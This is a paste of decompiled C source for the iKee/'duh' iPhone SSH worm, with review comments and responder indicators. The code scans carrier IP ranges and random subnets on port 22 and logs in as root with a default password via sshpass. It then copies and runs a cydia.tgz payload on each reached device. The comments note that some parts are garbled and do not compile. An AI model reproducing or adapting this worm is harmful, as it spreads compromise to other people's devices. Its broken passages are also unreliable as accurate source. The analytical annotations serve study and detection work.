FlyFar

worm/sshd.c

Mar 24th, 2024
  1. /*
  2.    This file has been generated by the Hex-Rays decompiler.
  3.    Copyright (c) 2007-2015 Hex-Rays <info@hex-rays.com>
  4.  
  5.    Detected compiler: GNU C++
  6.    
  7.    /// NOTE ///
  8.    As you can see, the 'duh' worm of 2009 is just another
  9.    iKee variant: the decompiled code is very nearly identical,
  10.    except that debug messages were mostly removed and the infection
  11.    routine was modified...
  12.    /// END ///
  13. */
  14.  
  15. #include "sshd.h"
  16.  
  17. int fdlock; // descriptor for /var/lock/ssh.lock; set by get_lock() and never closed in this listing, so the lock lasts for the life of the process
  18.  
  19. //----- (00001984) --------------------------------------------------------
      // Builds the first three octets of a scan target. Returns a heap string
      // "x.y.z." (note the trailing dot) allocated by asprintf(); the caller owns
      // it. Each octet is random() % 255, i.e. 0..254.
  20. char *randHost() // Generates a random SubNet to scan...
  21. {
  22.   char *retme;
  23.   int x = random() % 255;
  24.   int y = random() % 255;
  25.   int z = random() % 255;
  26.  
      // NOTE(review): srand() runs after the three draws and seeds rand(), not
      // random(); no srandom() call is visible in this listing, so the "random"
      // subnets may follow a reproducible sequence -- confirm against the binary.
  27.   srand(time(0));
  28.   asprintf(&retme, "%i.%i.%i.", x, y, z);
  29.   return retme;
  30. }
  31.  
  32. //----- (00001A80) --------------------------------------------------------
      // Single-instance guard. Opens (creating if needed, mode 0666)
      // /var/lock/ssh.lock and requests a write lock on its first byte with
      // F_SETLK, which fails immediately instead of waiting when the lock is held.
      // Returns 1 when the lock was taken, 0 when open() or fcntl() failed.
      // Host artifact for responders: the file /var/lock/ssh.lock, kept open by the
      // running process through the global fdlock.
  33. int get_lock(void) // Sets/Gets the status of the file lock located in /var/lock/ssh.lock
  34. {
  35.     struct flock fl;
  36.     fl.l_type = F_WRLCK;
  37.     fl.l_whence = SEEK_SET;
  38.     fl.l_start = 0;
  39.     fl.l_len = 1;
  40.     if((fdlock = open("/var/lock/ssh.lock", O_WRONLY|O_CREAT, 0666)) == -1)
  41.       return 0;
  42.     if(fcntl(fdlock, F_SETLK, &fl) == -1)
  43.       return 0;
  44.     return 1;
  45. }
  46.  
  47. //----- (00001B70) --------------------------------------------------------
      // Derives a scan range from the device's own address. Walks the interface
      // list from getifaddrs(); for the interface named "pdp_ip0" (the cellular
      // data interface name on iOS) it takes the numeric address a.b.c.d and
      // returns "a.b.c.0-a.b.(c+2).255". Returns "0.0.0.0-0.0.0.0" when
      // getnameinfo() fails or no such interface is found; exits the process if
      // getifaddrs() fails.
      // NOTE(review): this function does not compile as listed (the declaration
      // and loop-update lines are garbled, and `range` is not declared in this
      // file -- presumably it comes from sshd.h). Treat it as a hand-edited
      // reconstruction of the decompiler output, not as the worm's exact source.
  48. char *getAddrRange()
  49. {
  50.   struct ifaddrs, *ifaddr, *ifa;
  51.   int family, s;
  52.   char host[NI_MAXHOST];]
  53.  
  54.   if (getifaddrs(&ifaddr) == -1) {
  55.     perror("getifaddrs");
  56.     exit(EXIT_FAILURE);
  57.   }
  58.   for (ifa = ifaddr; ifa != NULL; i = ifa->ifa_next) {
  59.     family = ifa->ifa_addr->sa_family;
  60.     if (family == AF_INET || family == AF_INET6)
  61.     {
        // NI_NUMERICHOST: the address is formatted as text, no DNS lookup.
  62.       s = getnameinfo(ifa->ifa_addr,(family == AF_INET) ? sizeof(struct sockaddr_in): sizeof(struct sockaddr_in6), host, NI_MAXHOST, NULL, 0, NI_NUMERICHOST);
  63.       if (s != 0) {
  64.         printf("getnameinfo() failed: %s\n", gai_strerror(s));
  65.         return "0.0.0.0-0.0.0.0";
  66.       }
  67.       if (!strcmp(ifa->ifa_name, "pdp_ip0")) {
  68.         char *wee[20];
  69.         tokenise(host, wee, ".");
  70.         int octc = atoi(wee[2]);
          // Range spans three consecutive /24s: third octet c through c+2.
  71.         asprintf((char*)&range, "%s.%s.%i.0-%s.%s.%i.255", wee[0], wee[1], octc, wee[0], wee[1], octc+2);
  72.         return (char*)range;
  73.       }
  74.     }
  75.   }
      // Only reached when no interface matched; the early returns above skip it.
  76.   freeifaddrs(ifaddr);
  77.   return "0.0.0.0-0.0.0.0";
  78. }
  79.  
  80. //----- (00001DB4) --------------------------------------------------------
      // Splits `input` in place on the delimiter set `spl` using strtok(), strips
      // one trailing '\n' from each token, and stores the token pointers in
      // token[], followed by a NULL entry. Returns the number of tokens, or -1
      // once more than 4096 have been counted.
      // NOTE(review): `input` is declared char *[] but is used as a plain string;
      // callers in this file pass char *. The 4096 cap is unrelated to the size of
      // the callers' arrays (10 or 20 entries in this listing), and the first
      // token is dereferenced without a NULL check.
  81. int tokenise(char *input[], char *token[], char *spl)
  82. {
  83.   char *tokens;
  84.   int count = 0;
  85.  
  86.   tokens = strtok(input, spl);
  87.  
  88.   if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0';
  89.   token[count] = tokens;
  90.   while(tokens != NULL) {
  91.     count++;
  92.     if(count > 4096) return (-1);
  93.     tokens = strtok(NULL, spl);
  94.     if(tokens != NULL) {
  95.         if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0';
  96.       }
        // Also stores the terminating NULL when strtok() runs out of tokens.
  97.     token[count] = tokens;
  98.   }
  99.   return count;
  100. }
  101.  
  102. //----- (00001F1C) --------------------------------------------------------
       // Entry point. If get_lock() succeeds (no other instance holds
       // /var/lock/ssh.lock) it waits 60 seconds, then loops forever: for each
       // entry of ipRanges it calls scanner() on that range and then on three
       // ranges built from randHost(). The hard-coded ranges and their provider
       // labels below are the listing author's; from a network-monitoring view
       // the resulting behaviour is a sustained sweep of TCP port 22 (see
       // scanHost) originating from the infected device.
       // NOTE(review): as listed, the braces do not balance (one closing brace
       // is missing), `randSubNet` is not declared in this file, the loop bound
       // sizeof(ipRanges) is the array's size in bytes rather than its 13
       // entries, and one range string has five octets. These look like
       // reconstruction artifacts -- verify against the binary before relying on
       // the exact control flow.
  103. int main() {
  104.   if (get_lock()) {
  105.     sleep(60);
  106.     char *ipRanges[] = { getAddrRange(),                // Local Net
  107.                          "94.157.100.0-94.157.255.255", // T-mobile, Netherlands
  108.                          "87.103.52.255-87.103.66.255", // Vodafone, Portugal
  109.                          "94.157.0.0.0-120.157.99.255", // T-mobile, Netherlands
  110.                          "114.72.0.0-114.75.255.255",   // OPTUSINTERNET, Australia
  111.                          "92.248.90.0-92.248.120.255",  // MOBILKOM, Austria
  112.                          "81.217.74.0-81.217.74.255",   // Kabelsignal AG, Austria
  113.                          "84.224.60.0-84.224.80.255",   // Pannon GSM Telecommunications Inc, Hungary
  114.                          "188.88.100.0-188.88.160.255", // T-mobile, Netherlands
  115.                          "77.248.140.0-77.248.146.255", // UPC broadband, Austria
  116.                          "77.54.160.0-77.54.190.255",   // Vodafone, Portugal
  117.                          "80.57.116.0-80.57.131.255",   // UPC broadband, Austria
  118.                          "84.224.0.0-84.224.63.255" };  // Pannon GSM Telecommunications Inc, Hungary
  119.     while(1) {
  120.       for(int j = 0; j < sizeof(ipRanges); ++j) {
  121.         scanner(ipRanges[j]);
  122.         for (int k = 0; k <= 2; ++k) {
  123.           randSubNet = randHost();
  124.           char *zeRange;
  125.           asprintf(&zeRange, "%s.0-%s.255", randSubNet, randSubNet);
  126.           scanner(zeRange);
  127.       }
  128.     }
  129.   }
       // Presumably the path taken when the lock could not be acquired -- the
       // missing brace makes this ambiguous in the listing.
  130.   return 1;
  131. }
  132.  
  133. //----- (00002110) --------------------------------------------------------
       // Walks an address range given as "a.b.c.d-e.f.g.h". The string is split
       // on '-' and each half on '.', and the first three octets of each half
       // become loop bounds. The three octets are iterated independently (begin
       // to end for each), and the fourth octet always runs 0..255 regardless of
       // what the range string says. For every resulting address: scanHost()
       // tests TCP/22, checkHost() tests the login, and initfst() is called only
       // when both return 0.
       // NOTE(review): tokenise() modifies ipRange in place, and the host strings
       // allocated by asprintf() are never freed in this listing.
  134. void scanner(char *ipRange)
  135. {
  136.     char *wee[10];
  137.     char *begin[10];
  138.     char *end[10];
  139.     tokenise(ipRange, wee, "-");
  140.     int octaB, octaE, octbB, octbE, octcB, octcE;
  141.     tokenise(wee[0], begin, ".");
  142.     tokenise(wee[1], end, ".");
  143.     octaB = atoi(begin[0]);
  144.     octaE = atoi(end[0]);
  145.     octbB = atoi(begin[1]);
  146.     octbE = atoi(end[1]);
  147.     octcB = atoi(begin[2]);
  148.     octcE = atoi(end[2]);
  149.    
  150.     for (int loop1=octaB; loop1<=octaE; loop1++)
  151.     {
  152.         for (int loop2=octbB; loop2<=octbE; loop2++)
  153.         {
  154.             for (int loop3=octcB; loop3<=octcE; loop3++)
  155.             {
  156.                 for (int loop4=0; loop4<=255; loop4++)
  157.                 {
  158.                     char* host;
  159.                     asprintf(&host, "%i.%i.%i.%i", loop1, loop2, loop3, loop4);
                         // Both helpers return 0 on success, hence the negations.
  160.                     if (!scanHost(host) && !checkHost(host))
  161.                     {
  162.                         initfst(host);
  163.                     }
  164.                 }
  165.             }
  166.         }
  167.     }
  168. }
  169.  
  170. //----- (00002314) --------------------------------------------------------
       // Reachability probe: non-blocking TCP connect to port 22 of `host` with
       // a 10-second select() timeout. Returns 0 when the connection completed
       // (immediately, or with SO_ERROR == 0 after select()), -1 on timeout or
       // any connect error.
       // Detection note: on the wire this is one connection attempt to TCP/22
       // per address, issued sequentially across whole /24s.
       // NOTE(review): close() is only reached on the success path, so every
       // failed probe leaves its socket open in this listing; the return values
       // of socket() and fcntl() are not checked.
  171. int scanHost(char* host)
  172. {
  173.     int res, valopt, soc;
  174.     struct sockaddr_in addr;
  175.     long arg;
  176.     fd_set myset;
  177.     struct timeval tv;
  178.     socklen_t lon;
  179.     soc = socket(AF_INET, SOCK_STREAM, 0);
  180.     arg = fcntl(soc, F_GETFL, NULL);
  181.     arg |= O_NONBLOCK;
  182.     fcntl(soc, F_SETFL, arg);
  183.     addr.sin_family = AF_INET;
  184.     addr.sin_port = htons(22);
  185.     addr.sin_addr.s_addr = inet_addr(host);
  186.     res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
  187.     if (res < 0) {
         // EINPROGRESS is the expected result of connect() on a non-blocking socket.
  188.       if (errno == EINPROGRESS) {
  189.         tv.tv_sec = 10;
  190.         tv.tv_usec = 0;
  191.         FD_ZERO(&myset);
  192.         FD_SET(soc, &myset);
           // Writable within the timeout means the connect finished; SO_ERROR
           // then says whether it succeeded.
  193.         if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
  194.             lon = sizeof(int);
  195.             getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  196.             if (valopt) {
  197.               return -1;
  198.             }
  199.         }
  200.         else {
  201.             return -1; }
  202.       }
  203.       else { return -1; }
  204.     }
  205.     close(soc);
  206.     return 0;
  207. }
  208.  
  209. //----- (000024E0) --------------------------------------------------------
       // Login test. Writes the target address to syslog at LOG_DEBUG, then uses
       // popen() to run sshpass + ssh as root@host with the password VULN_PASS
       // (not defined in this listing -- presumably in sshd.h) and host-key
       // checking disabled, asking the remote side to print "99".
       // Returns 0 as soon as any byte of output is read, -1 otherwise.
       // Why "any byte": fgets(buff, 2, ...) reads at most one character, so the
       // strcmp() against "99" is always non-zero when something was read.
       // Defender notes: the check only succeeds where sshd accepts password
       // logins for root with the expected password, so changing that password
       // or disabling root password login removes the exposure. On an infected
       // device the artifacts are the syslog lines containing bare IP addresses
       // and child processes whose command line carries `sshpass -p` and
       // `StrictHostKeyChecking=no`.
       // NOTE(review): the early return skips pclose(), and pclose() is called
       // even when popen() returned NULL.
  210. int checkHost(char *host) {
  211.     FILE *in;
  212.     extern FILE *popen();
  213.     char buff[512];
  214.     char *execLine;
  215.     syslog(LOG_DEBUG, "%s", host); // One of the few times he decides to call a SYSLOG.
  216.     asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
  217.     if (in = popen(execLine, "r")) {
  218.         while (fgets(buff, 2, in) != NULL) {
  219.             if (strcmp(buff, "99"))
  220.                 return 0;
  221.         }
  222.     }
  223.     pclose(in);
  224.     return -1; // NOT VULN
  225. }
  226.  
  227. //----- (000025DC) --------------------------------------------------------
       // Runs `command` on `host` over ssh as root (same sshpass invocation as
       // checkHost) with "; echo 99" appended. Returns 0 as soon as any byte of
       // output is read, -1 when there was none or popen() failed.
       // Because the remote line always ends in "echo 99", a 0 result shows that
       // the login worked and something was printed; it does not show that
       // `command` itself succeeded.
       // NOTE(review): `command` and `host` are placed into the shell string
       // unescaped; the early return skips pclose().
  228. int runCommand(char* command, char *host) {
  229.     FILE *in;
  230.     extern FILE *popen();
  231.     char buff[512];
  232.     char *execLine;
  233.     asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'", VULN_PASS, host, command);
  234.     if (in = popen(execLine, "r")) {
           // Reads one character at a time (size 2 leaves room for one char + NUL).
  235.         while (fgets(buff, 2, in) != NULL) {
  236.             if (strcmp(buff, "99")) return 0;
  237.         }
  238.     }
  239.     pclose(in);
  240.     return -1;
  241. }
  242.  
  243. //----- (000026D8) --------------------------------------------------------
       // "Print" variant of runCommand: runs `command` on `host` over ssh as root
       // and copies the remote command's standard output to this process's
       // stdout. Always returns -1, whatever happened; the only caller in this
       // listing (initfst) ignores the result.
  244. int prunCommand(char* command, char *host) {
  245.     FILE *in;
  246.     extern FILE *popen();
  247.     char buff[512];
  248.     char *execLine;
  249.     asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'", VULN_PASS, host, command);
  250.     if (in = popen(execLine, "r")) {
  251.         while (fgets(buff, sizeof(buff), in) != NULL) {
  252.             printf("%s", buff);
  253.         }
  254.     }
  255.     pclose(in);
  256.     return -1;
  257. }
  258.  
  259. //----- (000027BC) --------------------------------------------------------
       // Copies a local file to `host` with scp (as root, same sshpass pattern),
       // then runs `which <dst>` remotely. Returns 0 as soon as that second
       // command yields any byte of output, -1 otherwise.
       // The local path is built as "./" + src, so it is resolved relative to the
       // process's working directory even when src looks absolute.
       // NOTE(review): the comparison against dst is made on a one-character
       // read, so it is non-zero for any dst longer than one character. The first
       // popen() stream is overwritten without pclose(), and the final pclose()
       // is reached only when the first popen() failed.
  260. int CopyFile(char* src, char* dst, char* host) {
  261.     FILE *in;
  262.     extern FILE *popen();
  263.     char buff[512];
  264.     char *execLine;
  265.     asprintf(&execLine, "sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s", VULN_PASS, src, host, dst);
  266.     if (in = popen(execLine, "r")) {
           // Drain scp's output so the transfer runs to completion.
  267.         while (fgets(buff, sizeof(buff), in) != NULL) {}
  268.         asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'", VULN_PASS, host, dst);
  269.         if (in = popen(execLine, "r")) {
  270.             while (fgets(buff, 2, in) != NULL ) {
  271.                 if (strcmp(buff, dst))
  272.                     return 0;
  273.             }
  274.             return -1;
  275.         }
  276.         return -1;
  277.     }
  278.     pclose(in);
  279.     return -1;
  280. }
  281.  
  282. //----- (0000294C) --------------------------------------------------------
       // Propagation step for a host that passed scanHost() and checkHost():
       // creates /private/var/mobile/home on the remote device, copies cydia.tgz
       // into it, then unpacks the archive there and runs ./inst. Always
       // returns 0.
       // Indicators for responders, all taken from this listing: the directory
       // /private/var/mobile/home/, the archive cydia.tgz inside it, and an
       // executable named inst extracted from that archive.
       // NOTE(review): runCommand() reports 0 whenever the remote side printed
       // anything, so the mkdir result is not actually checked here.
  283. int initfst(char *host) {
  284.   if (!runCommand("mkdir /private/var/mobile/home", host))
  285.   {
  286.     if (!CopyFile("/private/var/mobile/home/cydia.tgz", "/private/var/mobile/home/cydia.tgz", host))
  287.         prunCommand("cd /private/var/mobile/home/;tar xzf cydia.tgz;./inst", host);
  288.   }
  289.   return 0;
  290. }